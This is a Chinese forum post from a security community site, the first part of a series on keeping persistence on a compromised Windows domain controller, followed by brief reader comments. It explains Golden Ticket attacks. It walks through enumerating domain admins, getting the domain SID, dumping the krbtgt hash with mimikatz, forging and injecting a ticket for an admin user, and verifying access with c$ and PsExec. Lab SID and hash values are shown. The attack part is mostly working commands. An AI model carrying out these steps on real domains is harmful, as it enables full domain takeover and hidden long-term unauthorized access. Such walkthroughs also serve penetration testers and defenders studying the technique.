用户
搜索

[内网攻防] 域控权限维持(上)

  • TA的每日心情
    开心
    2021-6-26 11:05
  • 签到天数: 21 天

    连续签到: 1 天

    [LV.4]经常看看II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    18

    主题

    47

    帖子

    914

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2019-4-17

    i春秋签约作者

    发表于 2021-3-5 22:51:46 1110231
    本帖最后由 精通linux开关机 于 2021-3-5 22:51 编辑

    域控权限维持(上)

    ​          在我们取得域控账号密码后,防止密码被改失去权限会使用隐蔽后门一系列手段来维持我们取得的域控权限。把恶意文件放在Windows启动项目录中是最简单的方式,但是隐蔽性差,较主流的域控权限维持方法通常有三种,本篇讲第一种Golden Ticket。

    Golden Ticket

    ​          Golden Ticket(黄金票据)  ,黄金票据是伪造票据授予票据(TGT),也被称为认证票据。mimikatz工具把Golden Ticket的这种特性称为“万能票据”。
    ​          Krbtgt账号用来创建票据授予服务加密的密钥,该账号在创建域控制器时由系统自动创建,并且其密码随机分配。Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的 。TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。

    ​          利用krbtgt用户和Hash伪造票据授予票据(TGT),冒充任意用户身份无限制地访问整个域中的机器且还可以提升为域管理员。

    黄金票据的条件要求:

     1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot] 
     2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value] 
     3.域的KRBTGT账户NTLM密码哈希
     4.伪造用户名

    ​          接下来,我们对Golden Ticket进行利用测试。这里域控制器为 Server 2008 R2 Sp1  192.168.239.138 dc.pentestlab.com,域内主机为Server 2008 R2  192.168.239.133 zhangsan-pc.pentestlab.com。具体步骤如下。

    1.域管理

    net group "domain admins" /domain

    ​          查找域管理员执行效果如下

    1

    1

    ​                                                

    2.域SID

    ​          执行 whoami /user 命令,删除结果中SID的最后部分,获取域SID得到的效果如下。如果我们有PsTools,那么也可以使用PsGetsid.exe获取SID。

    2

    2

    3.NTLM Hash

    ​          获取krbtgt账户的NTLM Hash需要拥有访问域控制器的权限。使用交互方式或远程方式登录域控制器后,使用mimikatz来提取krbtgt账户的NTLM Hash,命令如下:

    privilege::debug
    mimikatz # lsadump::1sa /inject /name:krbtgt

    ​          或者

    mimikatz # 1sadump::dcsync /domain.pentestlab.com /user:krbtgt

    ​          获取krbtgt账户信息执行效果如下。

    3

    3

    4.Pass-the-Ticket攻击

    ​          伪造Golden Ticket进行Pass-the-Ticket攻击,伪造项主要包括以下3个。

    1.Domain:pentestlab.com
    2.SID:S-1-5-21-2540170591-2917293557-2322194170
    3.Hash:d1dd822b253f64cba7163e0509219d33

    ​          生成需要模拟用户的票据。以模拟域管理admin用户为例,执行的命令如下:

    mimikatz # kerberos::golden /user:admin /domain:pentestlab.com /sid:S-1-5-21-2540170591-2917293557-2322194170 /krbtgt:d1dd822b253f64cba7163e0509219d33 /admin:admin.tck /ptt

    ​          生成admin用户的票据,执行效果如下。

    4

    4

    5.验证成功

    ​          测试获得的域管理权限,相关命令如下:

    dir \\dc.pentestlab.com\c$
    P**ec.exe \\dc.pentestlab.com\ cmd.exe

    ​          访问C盘目录文件,执行效果分别如下。

    5

    5

    ​          以域管理权限执行cmd.exe,执行效果分别如下。

    6

    6

    给力,好文。
    使用道具 举报 回复
    步骤连贯精炼,意识到位
    使用道具 举报 回复
    文中说防止密码被改失去权限,拿到黄金密钥后改密码就不会失去权限吗?
    使用道具 举报 回复
    不错,感谢分享
    使用道具 举报 回复
    发表于 2021-3-8 09:24:19
    有点意思
    使用道具 举报 回复
    发表于 2021-3-8 09:25:34
    Pandame 发表于 2021-3-5 23:09
    文中说防止密码被改失去权限,拿到黄金密钥后改密码就不会失去权限吗?

    不会,因为krb密码没变
    使用道具 举报 回复
    发表于 2021-3-8 10:56:15
    感谢大神分享  
    使用道具 举报 回复
    发表于 2021-3-8 11:02:24
    感谢大佬分享,学习了
    使用道具 举报 回复
    发表于 2021-3-8 11:08:06
    后续呢 ?
    使用道具 举报 回复
    发表于 2021-3-8 11:32:22
    感谢分享
    使用道具 举报 回复
    写得挺好
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册